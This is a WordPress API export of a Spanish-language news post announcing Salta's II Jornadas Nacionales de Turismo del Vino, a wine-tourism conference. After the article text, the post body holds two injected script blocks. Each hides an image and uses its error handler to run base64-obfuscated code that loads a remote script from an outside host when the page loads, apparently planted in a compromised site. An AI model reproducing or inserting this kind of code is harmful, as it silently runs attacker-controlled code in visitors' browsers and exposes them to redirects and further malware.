{"id":1833,"date":"2022-11-23T15:18:25","date_gmt":"2022-11-23T18:18:25","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1833"},"modified":"2025-08-14T00:29:38","modified_gmt":"2025-08-14T03:29:38","slug":"iniciaran-las-ii-jornadas-nacionales-de-turismo-del-vino","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1833","title":{"rendered":"Iniciar\u00e1n las II Jornadas Nacionales de Turismo del Vino"},"content":{"rendered":"\n<h5 class=\"has-vivid-green-cyan-background-color has-background wp-block-heading\"><em>Ma\u00f1ana jueves 24 de noviembre iniciar\u00e1 este encuentro nacional e internacional que reunir\u00e1 a referentes del Enoturismo. La ceremonia de inauguraci\u00f3n tendr\u00e1 lugar a las 12 del mediod\u00eda en el Centro de Convenciones de la Ciudad de Salta.<\/em><\/h5>\n\n\n\n<p>Autoridades provinciales y nacionales encabezar\u00e1n la jornada inaugural de las II Jornadas Nacionales de Turismo del Vino que se realizar\u00e1n en la provincia durante el 24 y 25 de noviembre. Este ser\u00e1 el punto de encuentro para referentes del enoturismo de diferentes partes del pa\u00eds y el mundo.<\/p>\n\n\n\n<p>La ceremonia inaugural iniciar\u00e1 a las 12 del mediod\u00eda en el Centro de Convenciones de la Ciudad de Salta. Cabe aclarar que las conferencias y talleres comenzar\u00e1n a las 9 de la ma\u00f1ana.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ma\u00f1ana jueves 24 de noviembre iniciar\u00e1 este encuentro nacional e internacional que reunir\u00e1 a referentes del Enoturismo. La ceremonia de inauguraci\u00f3n tendr\u00e1 lugar a las 12 del mediod\u00eda en el Centro de Convenciones de la Ciudad de Salta. Autoridades provinciales y nacionales encabezar\u00e1n la jornada inaugural de las II Jornadas Nacionales de Turismo del Vino [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1834,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24,21],"tags":[],"class_list":{"0":"post-1833","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1833"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1833"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1833\/revisions"}],"predecessor-version":[{"id":7267,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1833\/revisions\/7267"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1834"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1833"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1833"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1833"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}